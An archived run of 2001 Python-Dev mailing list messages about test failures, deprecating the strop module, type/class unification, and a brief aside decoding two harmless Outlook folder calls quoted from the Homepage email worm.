sent-mail and trash, or some such, but I don't know enough about Outlook to
know if it even *has* sent-mail and trash folders :)

Thanx for sending it through, Samuele, it was fun reading, and useful to our
helpdesk (especially the fact that it only sends out mails once, even though
it starts the porn page every time, and that it doesn't do anything harmful
at all.)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From MarkH at ActiveState.com  Thu May 10 12:36:13 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Thu, 10 May 2001 20:36:13 +1000
Subject: [Python-Dev] Homepage
In-Reply-To: <20010510113138.K16486@xs4all.nl>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEEPDMAA.MarkH@ActiveState.com>

> > Set u=t.GetDefaultFolder(6)
> > Set u=t.GetDefaultFolder(3)

> I know it's off-topic, but Greg started it! ;-) Does anyone know which
> folders those two 'GetDefaultFolder' statements open ? I suspect it's
> sent-mail and trash, or some such, but I don't know enough about Outlook to
> know if it even *has* sent-mail and trash folders :)

Running makepy.py over the Outlook type library yields the following:

	olFolderCalendar              =0x9        # from enum OlDefaultFolders
	olFolderContacts              =0xa        # from enum OlDefaultFolders
	olFolderDeletedItems          =0x3        # from enum OlDefaultFolders
	olFolderDrafts                =0x10       # from enum OlDefaultFolders
	olFolderInbox                 =0x6        # from enum OlDefaultFolders
	olFolderJournal               =0xb        # from enum OlDefaultFolders
	olFolderNotes                 =0xc        # from enum OlDefaultFolders
	olFolderOutbox                =0x4        # from enum OlDefaultFolders
	olFolderSentMail              =0x5        # from enum OlDefaultFolders
	olFolderTasks                 =0xd        # from enum OlDefaultFolders

So it appears they are the Inbox (6) and Deleted Items (3) folders.
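The numeric arguments can be decoded mechanically. A minimal Python 3 sketch using the standard `enum` module with the values copied from the makepy listing above; it does not touch COM, and the helper `folder_name` is hypothetical:

```python
from enum import IntEnum

class OlDefaultFolders(IntEnum):
    # Values as listed in the makepy output above.
    olFolderDeletedItems = 0x3
    olFolderOutbox = 0x4
    olFolderSentMail = 0x5
    olFolderInbox = 0x6
    olFolderCalendar = 0x9
    olFolderContacts = 0xA
    olFolderJournal = 0xB
    olFolderNotes = 0xC
    olFolderTasks = 0xD
    olFolderDrafts = 0x10

def folder_name(code):
    """Map a GetDefaultFolder() argument back to its enum name."""
    return OlDefaultFolders(code).name
```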

Mark.


From tim.one at home.com  Thu May 10 10:54:42 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 10 May 2001 04:54:42 -0400
Subject: [Python-Dev] test___all__ failing on WIndows
Message-ID: <LNBBLJKPBEHFEDALKOLCKEFAKBAA.tim.one@home.com>

> python  ../lib/test/regrtest.py test___all__

test___all__
test test___all__ failed -- tty has no __all__ attribute
1 test failed: test___all__

C:\Code\python\dist\src\PCbuild>

I assume this is yet another case where some excruciatingly non-obvious
sequence of failing imports manages to leave behind a damaged module object
in sys.modules that prevents test___all__'s import of tty from getting the
ImportError it *ought* to get under Windows (and betting termios is the
ultimate culprit).

I've fixed enough of these.  Somebody who thinks this is "a feature" gets to
do it this time <wink/snarl>.


From guido at digicool.com  Thu May 10 15:43:07 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 08:43:07 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 22:00:30 -0400."
             <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com> 
Message-ID: <200105101343.IAA01450@cj20424-a.reston1.va.home.com>

> [Guido]
> > Yes, but in the mean time the fact that it's buggy doesn't bother
> > me at all.  Let it be as buggy as it always was -- that's one more
> > reason to stop using it! :-)

[Tim]
> I think that's unsustainable in this specific case: stringobject and
> stropmodule contained several utility functions with the same names
> that clearly started life as identical code.  Over time they got out
> of synch, and when they punched me in the face today, I had no idea
> which was "right" and which "wrong".  Turned out they both had the
> same bug, and the clearest way to fix it in stringobject.c without
> leaving a more inconsistent x-module mess was to bring the
> once-common utility routines back into synch.

Of course, the real bug was copy-and-paste programming.  The common
code should have been factored out rather than copied.

> As /F said, though, the mymemreplace() approach is inefficient and
> "should be" replaced wholesale.  If that's done in stringobject.c
> alone, great, then I won't care about the legacy routines in
> stropmodule.c either.  What I can't abide is having one copy of a
> function in the codebase work and a clone of it not work -- unless
> you can keep the undocumented history of both in your mind at all
> times, you're just as likely to bump into the broken one first when
> searching the code base, and if you're unlucky never even realize it
> is "the broken one" (or, if you're lucky, bump into the good one
> too, and then pee away time trying to understand the differences).

Here's an idea.  We remove stropmodule.c, and replace it with a
strop.py that issues a warning and then imports selected things from
string.py.

The only complication is that there are a few constants and one
function in strop that are still imported into string.py; I propose to
move these to an "internal" extension module (e.g. "_string").
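A rough sketch of what such a shim might contain, written for Python 3 (where the old `lowercase`/`uppercase` constants are spelled `ascii_lowercase`/`ascii_uppercase` in `string`). The warning text and the set of re-exported names are assumptions for illustration, not the contents of the proposal:

```python
"""strop.py: hypothetical deprecation shim standing in for stropmodule.c."""
import warnings

warnings.warn("the strop module is deprecated; use string methods instead",
              DeprecationWarning, stacklevel=2)

# Constants re-exported from string (Python 3 names on the right).
from string import whitespace, digits
from string import ascii_lowercase as lowercase
from string import ascii_uppercase as uppercase

def replace(s, old, new, maxreplace=-1):
    """Delegate to the str method instead of keeping a second copy."""
    return s.replace(old, new, maxreplace)

def split(s, sep=None, maxsplit=-1):
    """Delegate to str.split for the same reason."""
    return s.split(sep, maxsplit)
```

Because every function forwards to the one real implementation, there is no second copy left to drift out of sync.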

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Thu May 10 16:02:59 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 09:02:59 -0500
Subject: [Python-Dev] test_mmap failing?
In-Reply-To: Your message of "Wed, 09 May 2001 23:17:34 -0400."
             <15098.2126.368714.159135@slothrop.digicool.com> 
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>  
            <15098.2126.368714.159135@slothrop.digicool.com> 
Message-ID: <200105101402.JAA01678@cj20424-a.reston1.va.home.com>

> The latest CVS build works on my Linux 2.2.12 system.  No problem with
> test_mmap.  But test_pty does fail with some complaints about FCNTL,
> which Fred just removed.  Maybe Fred is working in an alternate
> universe where test_mmap and test_pty are swapped.

Strange.  They *both* work for me with the latest CVS (and even after
removing all *.pyc files!), although last night (?) I recall seeing a
test_pty failure too.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip at pobox.com  Thu May 10 16:16:24 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 10 May 2001 09:16:24 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>
References: <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com>
	<200105100227.VAA00607@cj20424-a.reston1.va.home.com>
Message-ID: <15098.41656.128146.826459@beluga.mojam.com>

    Guido> Yes, but in the mean time the fact that it's buggy doesn't bother
    Guido> me at all.  Let it be as buggy as it always was -- that's one
    Guido> more reason to stop using it! :-)

In fact, perhaps the import warning could mention that strop is buggy and
won't be fixed... :-)

Skip


From skip at pobox.com  Thu May 10 16:32:15 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 10 May 2001 09:32:15 -0500
Subject: [Python-Dev] test___all__ failing on WIndows
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEFAKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCKEFAKBAA.tim.one@home.com>
Message-ID: <15098.42607.84670.323361@beluga.mojam.com>

    >> python  ../lib/test/regrtest.py test___all__
    Tim> test___all__
    Tim> test test___all__ failed -- tty has no __all__ attribute
    Tim> 1 test failed: test___all__

grumble, grumble...

    Tim> I assume this is yet another case where some excruciatingly
    Tim> non-obvious sequence of failing imports manages to leave behind a
    Tim> damaged module object in sys.modules that prevents test___all__'s
    Tim> import of tty from getting the ImportError it *ought* to get under
    Tim> Windows (and betting termios is the ultimate culprit).

I (thankfully) gave up even pretending to run Windows recently, so I can
only make a suggestion for others who look into this problem.  Try this:
Change test___all__.check_all so that the except clause reads:

    except ImportError, msg:

then print out msg when an import fails.  You should get the actual module
that failed to import.  If foo.py consists of simply "import bar", and I
import it, I see that bar couldn't be imported:

    >>> try:
    ...   import foo
    ... except ImportError, msg:
    ...   print msg
    ... 
    No module named bar
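The same idea in self-contained form, written for Python 3 (`except ImportError as msg` replaces the old comma syntax). `check_all` here is a hypothetical stand-in for the function in test___all__: it returns a message instead of failing, reports the ImportError text (which names the module that actually failed), and defensively drops any half-initialized entry from `sys.modules`, the failure mode Tim suspects:

```python
import importlib
import sys

def check_all(modname):
    """Check that modname defines __all__ and that 'from modname import *'
    binds exactly those names. Returns None on success, else a message."""
    try:
        mod = importlib.import_module(modname)
    except ImportError as msg:
        # msg names the module that really failed, which may be a
        # dependency rather than modname itself.
        # Defensive cleanup; Python 3 already removes failed imports.
        sys.modules.pop(modname, None)
        return "import of %s failed: %s" % (modname, msg)
    if not hasattr(mod, "__all__"):
        return "%s has no __all__ attribute" % modname
    names = {}
    exec("from %s import *" % modname, names)
    names.pop("__builtins__", None)  # exec() adds this to the globals dict
    if sorted(names) != sorted(mod.__all__):
        return "%s: 'import *' names do not match __all__" % modname
    return None
```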

Skip


From fdrake at acm.org  Thu May 10 16:57:59 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 10 May 2001 10:57:59 -0400 (EDT)
Subject: [Python-Dev] Re: test_mmap failing?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
Message-ID: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>

Tim Peters writes:
 > But having suffered too many "impossible problems" the last 36 hours, my
 > confidence is shot <0.93 wink>.  Is test_mmap failing for anyone else under
 > current CVS?  Fred, are you *sure* it fails for you -- if so, does the
 > problem actually go away if you revert mmapmodule.c?

  It was indeed showing the behavior I described!  I figured out what
it was this morning and closed the patch again.
  The problem, of course(!), had nothing to do with mmap, before or
after any of the recent changes to mmap.  Or any old changes.  It had
a lot to do with the change I made to the socket module.  ;-)
  While figuring out the reported bug in the socket module, I created
named pipes, including one named "foo".  The mmap test opens a file
"foo" with mode "w+" in the directory in which I just happened to
create the named pipe, so it ended up with a file object opened on a
pipe -- things just don't work the same for these beasts!  Needless to
say test_mmap failed with a cryptic error message.
  This begs the question, though -- should tests that create temp
files check that the files don't already exist, and fail with a more
descriptive error if they do?
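One way to get the more descriptive failure: a minimal Python 3 sketch of a hypothetical pre-flight check a test could run before opening its scratch file, using `os.stat()` and the file-type tests in the `stat` module. The function names are assumptions, not part of the test suite:

```python
import os
import stat

def describe_scratch_conflict(path):
    """Return None if path is free or is a regular file (safe to open
    with mode 'w+'); otherwise return a message describing what is there."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return None                       # nothing there: safe to create
    if stat.S_ISREG(st.st_mode):
        return None                       # stale regular file: will be truncated
    if stat.S_ISFIFO(st.st_mode):
        kind = "named pipe"
    elif stat.S_ISDIR(st.st_mode):
        kind = "directory"
    else:
        kind = "non-regular file"
    return "scratch path %r already exists as a %s" % (path, kind)

def ensure_scratch_path(path):
    """Fail early, with a clear message, instead of a cryptic IOError later."""
    problem = describe_scratch_conflict(path)
    if problem:
        raise RuntimeError(problem + "; remove it before running the test")
```

The sketch tolerates a leftover regular file because the test overwrites it anyway; rejecting every existing path would be the stricter variant of Fred's suggestion.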


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake at acm.org  Thu May 10 16:59:08 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 10 May 2001 10:59:08 -0400 (EDT)
Subject: [Python-Dev] test_mmap failing?
In-Reply-To: <15098.2126.368714.159135@slothrop.digicool.com>
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
	<15098.2126.368714.159135@slothrop.digicool.com>
Message-ID: <15098.44220.515660.330116@cj42289-a.reston1.va.home.com>

Jeremy Hylton writes:
 > The latest CVS build works on my Linux 2.2.12 system.  No problem with
 > test_mmap.  But test_pty does fail with some complaints about FCNTL,
 > which Fred just removed.  Maybe Fred is working in an alternate
 > universe where test_mmap and test_pty are swapped.

  Or, I could just be working in an alternate universe altogether.
I've been known to do that....


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From paulp at ActiveState.com  Thu May 10 23:55:36 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Thu, 10 May 2001 14:55:36 -0700
Subject: [Python-Dev] Type/class
Message-ID: <3AFB0E58.1F0ABCA6@ActiveState.com>

-------- Original Message --------
Log Message:

Make attributes of subtypes writable, but only for dynamic subtypes
derived in Python using a class statement; static subtypes derived in
C still have read-only attributes.
-------- Original Message --------

I would like to argue that "plain old C types" should act as if they
have __dict__s for consistency with other types. It is sometimes useful
to be able to annotate objects by adding attributes to them. But this
only works with class instance objects, not instances of types.

 Paul Prescod


From jeremy at digicool.com  Thu May 10 23:59:34 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Thu, 10 May 2001 17:59:34 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <3AFB0E58.1F0ABCA6@ActiveState.com>
References: <3AFB0E58.1F0ABCA6@ActiveState.com>
Message-ID: <15099.3910.648127.25900@slothrop.digicool.com>

>>>>> "PP" == Paul Prescod <paulp at ActiveState.com> writes:

  PP> I would like to argue that "plain old C types" should act as if
  PP> they have __dict__s for consistency with other types. It is
  PP> sometimes useful to be able to annotate objects by adding
  PP> attributes to them. But this only works with class instance
  PP> objects, not instances of types.

Every type should have an __dict__ of type dict?  Then every dict
must have an __dict__, including the __dict__ of __dict__?

Once every object has an __dict__, every object will be mutable.  Then
no object will be usable as a dict key and we can get rid of dicts
entirely.

Jeremy


From fdrake at cj42289-a.reston1.va.home.com  Fri May 11 00:47:14 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Thu, 10 May 2001 18:47:14 -0400 (EDT)
Subject: [Python-Dev] [maintenance doc updates]
Message-ID: <20010510224714.15E4328946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/maint-docs/

Incremental update for the maintenance version docs.


From fdrake at cj42289-a.reston1.va.home.com  Fri May 11 01:04:40 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Thu, 10 May 2001 19:04:40 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010510230440.30DB228946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental update for the development version of the docs.


From guido at digicool.com  Fri May 11 02:03:13 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 19:03:13 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Thu, 10 May 2001 14:55:36 MST."
             <3AFB0E58.1F0ABCA6@ActiveState.com> 
References: <3AFB0E58.1F0ABCA6@ActiveState.com> 
Message-ID: <200105110003.TAA02924@cj20424-a.reston1.va.home.com>

Glad somebody is watching what I'm doing here -- I was afraid I was
having too much fun by myself! :-)

> -------- Original Message --------
> Log Message:
> 
> Make attributes of subtypes writable, but only for dynamic subtypes
> derived in Python using a class statement; static subtypes derived in
> C still have read-only attributes.
> -------- Original Message --------
> 
> I would like to argue that "plain old C types" should act as if they
> have __dict__s for consistency with other types.

Good point.  Plain old types currently (in the descr-branch) have a
readonly dict (using a proxy) and no settable attributes.  I will
probably give types settable attributes in a next revision, but I
prefer not to make the type's dict writable -- I need to be able to
watch the setattr calls so that if someone changes
DictType.__getitem__ I can change the mp_subscript to a C function
that calls the __getitem__ method.  For speed reasons, if you don't
override them, the C tp_slot functions carry out the operation
directly, and the __slot__ methods call the C tp_slot functions; but
when __slot__ is overridden, tp_slot must call __slot__.
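A toy model can show why the setattr calls need to be watched. This is a Python 3 sketch under stated assumptions, not the descr-branch code: `TypeModel`, `SLOT_FOR` and `call_slot` are hypothetical names, and only two slots are modeled. Slots start out holding the fast built-in implementations; assigning a special method on the type redirects the matching slot to call it:

```python
# Hypothetical mapping from special-method names to C-level slot names.
SLOT_FOR = {"__getitem__": "mp_subscript", "__len__": "mp_length"}

class TypeModel:
    """Toy model of a built-in type: a table of 'C' slot functions plus
    a setattr hook that keeps the table in sync with Python overrides."""

    def __init__(self, name, slots):
        object.__setattr__(self, "name", name)
        object.__setattr__(self, "slots", dict(slots))

    def __setattr__(self, attr, value):
        object.__setattr__(self, attr, value)
        slot = SLOT_FOR.get(attr)
        if slot is not None:
            # Overridden in Python: the slot must now call the method.
            def call_method(obj, *args):
                return value(obj, *args)
            self.slots[slot] = call_method

    def call_slot(self, slot, obj, *args):
        """What the interpreter does for e.g. obj[key]: use the slot."""
        return self.slots[slot](obj, *args)

# Not overridden yet: slots hold the built-in implementations directly.
DictModel = TypeModel("dict", {"mp_subscript": dict.__getitem__,
                               "mp_length": dict.__len__})
```

Without the hook in `__setattr__`, a new `__getitem__` would sit in the type's dict while `obj[key]` kept using the old slot.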

> It is sometimes useful
> to be able to annotate objects by adding attributes to them. But this
> only works with class instance objects, not instances of types.
> 
>  Paul Prescod

If you're talking about *instances*: instances of subtypes of built-in
types have a dict of their own to which you can add stuff to your
heart's content.  Instances of built-in types will continue not to
have a dict (it would cost too much space if *every* object had a
dict, even if it was a NULL pointer when no attrs are defined).

If you mean you want to annotate types like you can annotate classes,
that should be possible once I implement what I describe above.
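The distinction drawn here for instances matches how Python 3 behaves: instances of built-in types have no per-instance dict, while instances of a class-statement subtype do (unless it declares `__slots__`). A small sketch; `can_annotate` and `AnnotatableList` are hypothetical names:

```python
def can_annotate(obj):
    """Return True if an arbitrary new attribute can be set on obj."""
    try:
        obj.note = "annotated"
    except AttributeError:
        return False
    return True

class AnnotatableList(list):
    """A subtype defined with a class statement: instances get a __dict__."""
```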

--Guido van Rossum (home page: http://www.python.org/~guido/)


From paulp at ActiveState.com  Fri May 11 01:22:16 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Thu, 10 May 2001 16:22:16 -0700
Subject: [Python-Dev] Type/class
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <15099.3910.648127.25900@slothrop.digicool.com>
Message-ID: <3AFB22A8.A0A6A4D4@ActiveState.com>

Jeremy Hylton wrote:
> 
> >>>>> "PP" == Paul Prescod <paulp at ActiveState.com> writes:
> 
>   PP> I would like to argue that "plain old C types" should act as if
>   PP> they have __dict__s for consistency with other types. It is
>   PP> sometimes useful to be able to annotate objects by adding
>   PP> attributes to them. But this only works with class instance
>   PP> objects, not instances of types.
> 
> Every type should have an __dict__ of type dict?  Then every dict
> must have an __dict__, including the __dict__ of __dict__?

What's wrong with that? Every object has a type, even type objects, and
type types. It only becomes a problem if you try to recursively walk all
the dictionaries in the system adding information to them. Otherwise
they have null pointers that "act as if" they were empty dictionaries.

> Once every object has an __dict__, every object will be mutable.  Then
> no object will be usable as a dict key and we can get rid of dict's
> entirely.

According to that argument, instances cannot be dictionary keys. That is
simply not true. Objects do not implement their hash functions in terms
of ALL of their attributes!
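The point can be checked directly: a hash only has to stay stable over the attributes it is computed from. A minimal Python 3 sketch (class and function names are hypothetical) in which an instance gains a new attribute after being used as a dict key, and lookup still succeeds:

```python
class Point:
    """Hashes and compares on (x, y) only; other attributes may change."""

    def __init__(self, x, y):
        self.x = x
        self.y = y

    def __eq__(self, other):
        return isinstance(other, Point) and (self.x, self.y) == (other.x, other.y)

    def __hash__(self):
        return hash((self.x, self.y))

def lookup_after_annotation():
    p = Point(1, 2)
    table = {p: "found"}
    p.label = "added later"    # mutates p, but not the hashed fields
    return table[Point(1, 2)]  # equal key, same hash: lookup succeeds
```

Instances that define neither `__eq__` nor `__hash__` hash by identity, so adding attributes never affects them at all.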

-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From mwh at python.net  Fri May 11 01:31:53 2001
From: mwh at python.net (Michael Hudson)
Date: Fri, 11 May 2001 00:31:53 +0100 (BST)
Subject: [Python-Dev] python-dev summary 2001-04-26 - 2001-05-10
Message-ID: <Pine.LNX.4.30.0105110031170.14911-100000@localhost.localdomain>

 This is a summary of traffic on the python-dev mailing list between
 Apr 26 and May 9 (inclusive) 2001.  It is intended to inform the
 wider Python community of ongoing developments.  To comment, just
 post to python-list at python.org or comp.lang.python in the usual
 way. Give your posting a meaningful subject line, and if it's about a
 PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep
 iteration).  All python-dev members are interested in seeing ideas
 discussed by the community, so don't hesitate to take a stance on a
 PEP if you have an opinion.

 This is the seventh summary written by Michael Hudson.
 Summaries are archived at:

  <http://starship.python.net/crew/mwh/summaries/>

   Posting distribution (with apologies to mbm)

   Number of articles in summary: 228

    40 |                         [|]
       |                         [|]
       |                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
    30 |                         [|]                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
    20 |     [|]                 [|] [|]                     [|]
       |     [|]                 [|] [|]                     [|]
       |     [|]                 [|] [|] [|]                 [|]
       |     [|]                 [|] [|] [|]             [|] [|]
       |     [|]                 [|] [|] [|]             [|] [|]
    10 |     [|]                 [|] [|] [|]         [|] [|] [|]
       |     [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
       | [|] [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
       | [|] [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
       | [|] [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
     0 +-007-024-010-001-010-010-044-023-019-010-002-012-017-039
        Thu 26| Sat 28| Mon 30| Wed 02| Fri 04| Sun 06| Tue 08|
            Fri 27  Sun 29  Tue 01  Thu 03  Sat 05  Mon 07  Wed 09

  A fairly quiet, but interesting fortnight (and I don't mean the
  sarcastic replies to the Homepage virus).  A few build problems and
  bugs fixed, and one very involved discussion (cf. most of the rest
  of this summary).


    * type == class? *

 Guido posted a message from Jim Althoff describing the metaclass
 system used in Smalltalk:

  <http://mail.python.org/pipermail/python-dev/2001-May/014508.html>

 He also mentioned a problem that is bound to bite any attempt to heal
 the type/class split in Python.  If there are to be no special cases
 in the type system then classes and types in particular should be
 instances.  This sounds innocuous, but consider:

    class MyDictType(DictType):
        def __repr__(self):
            return "MyDictType(%s)" % DictType.__repr__(self)

 The code is hoping that, as in today's Python, DictType.__repr__ will
 return an unbound method - the __repr__ method of vanilla
 dictionaries, so that output of the form

    MyDictType({1:2})

 will be given.  But DictType is now an instance, so there's another
 interpretation for DictType.__repr__ - the bound DictType's own
 __repr__ method!  This is a fundamental problem; currently
 "class.attr" and "instance.attr" have different meanings in Python,
 and any attempt to conflate the notions of "class" and "instance" is
 bound to run aground.  Guido proposed some hairy disambiguation rules
 in the above-linked message, but no-one was particularly enthused
 about them, possibly because no-one could really get their head round
 them.
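For comparison only: in Python 3, where every class is a new-style type, attribute lookup on a class consults the class and its bases before the metatype's non-data descriptors such as `type.__repr__`, so `DictType.__repr__` (spelled `dict.__repr__` today) means dict's own method. A minimal sketch of both interpretations under that rule; `MyDict` and `metatype_repr` are illustrative names:

```python
class MyDict(dict):
    def __repr__(self):
        # dict.__repr__ is found in dict's own namespace first, so this
        # is the plain dictionary repr, not the repr of the class object.
        return "MyDict(%s)" % dict.__repr__(self)

def metatype_repr(cls):
    # The other interpretation: the repr of the class object itself,
    # reached explicitly through the metatype.
    return type.__repr__(cls)
```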

 The long term solution is to change the syntax for getting - or
 removing entirely - unbound methods.  As far as anyone can make out,
 all that unbound methods are used for is calling superclasses' methods
 from overriding methods, so if one can find another way of spelling
 that, then removing unbound methods entirely could be contemplated.
 So the discussion on that went around for a bit, with no really new
 compelling ideas surfacing.  There was some support for some kind of
 souped up super.foo() construct:

  <http://mail.python.org/pipermail/python-dev/2001-May/014523.html>
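For readers today: Python later gained a built-in `super()` (in 2.2, with the zero-argument form added in Python 3) that covers the main use named above. A minimal Python 3 sketch; no claim is made that it matches any of the proposals linked here:

```python
class Base:
    def greet(self):
        return "base"

class Derived(Base):
    def greet(self):
        # Explicit spelling, still valid: Base.greet(self).
        # super() finds the next class in the MRO without naming Base.
        return "derived+" + super().greet()
```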

 To me, the most plausible ideas came from Thomas Heller:

  <http://mail.python.org/pipermail/python-dev/2001-May/014517.html>

 and from Paul Dubois, who suggested nicking the feature renaming
 feature from Eiffel:

  <http://mail.python.org/pipermail/python-dev/2001-May/014573.html>

 though the best syntax for the latter is far from clear.

 There's also the king-sized issue of backwards compatibility; to a
 first degree of approximation, *all* Python code that uses
 inheritance would need to be updated to accommodate changes in the
 meaning of "class.attribute".  Another __future__ statement, maybe?


    * data.decode *

 Marc-Andre Lemburg asked whether string objects should sprout a
 .decode method:

  <http://mail.python.org/pipermail/python-dev/2001-May/014547.html>

 After some umming and arring and accusations of bloat, this got BDFL
 approval, and should appear in CVS imminently.
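In Python 3 terms, `decode()` lives on `bytes` and `encode()` on `str`, which makes the direction of each conversion explicit. A small sketch; `roundtrip` is a hypothetical helper:

```python
def roundtrip(text, encoding="utf-8"):
    """Encode text to bytes, then decode those bytes back to text."""
    data = text.encode(encoding)
    return data, data.decode(encoding)
```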


    * Moving MacPython to sourceforge *

 Jack Jansen posted notice that he intends to move the MacPython code
 over to sourceforge:

  <http://mail.python.org/pipermail/python-dev/2001-May/014611.html>

 It will be nice to finally have all the code in the same place!

Cheers,
M.


From paulp at ActiveState.com  Fri May 11 02:26:43 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Thu, 10 May 2001 17:26:43 -0700
Subject: [Python-Dev] Type/class
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com>
Message-ID: <3AFB31C3.5CEF9064@ActiveState.com>

Guido van Rossum wrote:
> 
>...
> 
> Good point.  Plain old types currently (in the descr-branch) have a
> readonly dict (using a proxy) and no settable attributes.  I will
> probably give types settable attributes in a next revision, but I
> prefer not to make the type's dict writable -- I need to be able to
> watch the setattr calls so that if someone changes
> DictType.__getitem__ I can change the mp_subscript to a C function
> that calls the __getitem__ method.  

I'm happy to have you look and see if I'm setting something magical. But
if I'm not, I would like you to just add the thing I made to an internal
private dictionary and remember it. I think that's what you are talking
about.

>...
> If you're talking about *instances*: instances of subtypes of built-in
> types have a dict of their own to which you can add stuff to your
> heart's content.  Instances of built-in types will continue not to
> have a dict (it would cost too much space if *every* object had a
> dict, even if it was a NULL pointer when no attrs are defined).

Darn. That *is* what I was hoping for.

There is an implementation that is slowish if you use it, but has little
cost if you don't: keep a big dict mapping object pointers to their
associated dictionaries (if any). For purposes of discussion, call it
sys._associations. Then have the getattr on "PyObject" look in this dict
of dicts for attributes that it can't otherwise find, and setattr
construct dictionaries in the dict of dicts if necessary.

That's the usual workaround anyhow, so this would be a nicer syntax and a
more orthogonal model.

Price: a hasattr that would return false or getattr that would raise
AttributeError would be a little slower. They would have to check the
dictionary of dictionaries before deciding that they really don't have
the attribute.
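At the Python level, the usual workaround looks roughly like this. A minimal Python 3 sketch with hypothetical names (`_associations`, `set_assoc`, `get_assoc`), not the proposed C implementation. It keys the side table on `id(obj)` as the analogue of an object pointer, and it stores the object itself so that its id cannot be reused while the entry exists:

```python
# Hypothetical stand-in for the proposed sys._associations:
# id(obj) -> (obj, attribute dict).  Holding obj keeps it alive, so its
# id() stays unique, at the cost of never freeing annotated objects.
_associations = {}

def set_assoc(obj, name, value):
    entry = _associations.setdefault(id(obj), (obj, {}))
    entry[1][name] = value

def get_assoc(obj, name):
    """Normal attribute lookup first; fall back to the side table."""
    try:
        return getattr(obj, name)
    except AttributeError:
        pass
    try:
        return _associations[id(obj)][1][name]
    except KeyError:
        # This extra probe is the slowdown for lookups that fail.
        raise AttributeError("%r object has no attribute %r"
                             % (type(obj).__name__, name)) from None
```

The fallback path only costs anything when normal lookup fails, which is the price described above.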
-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From guido at digicool.com  Fri May 11 03:57:36 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 20:57:36 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Thu, 10 May 2001 17:26:43 MST."
             <3AFB31C3.5CEF9064@ActiveState.com> 
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com>  
            <3AFB31C3.5CEF9064@ActiveState.com> 
Message-ID: <200105110157.UAA03123@cj20424-a.reston1.va.home.com>

> > Good point.  Plain old types currently (in the descr-branch) have a
> > readonly dict (using a proxy) and no settable attributes.  I will
> > probably give types settable attributes in a next revision, but I
> > prefer not to make the type's dict writable -- I need to be able to
> > watch the setattr calls so that if someone changes
> > DictType.__getitem__ I can change the mp_subscript to a C function
> > that calls the __getitem__ method.  
> 
> I'm happy to have you look and see if I'm setting something magical. But
> if I'm not, I would like you to just add the thing I made to an internal
> private dictionary and remember it. I think that's what you are talking
> about.

OK, we agree on this one.

> >...
> > If you're talking about *instances*: instances of subtypes of built-in
> > types have a dict of their own to which you can add stuff to your
> > heart's content.  Instances of built-in types will continue not to
> > have a dict (it would cost too much space if *every* object had a
> > dict, even if it was a NULL pointer when no attrs are defined).
> 
> Darn. That *is* what I was hoping for.
> 
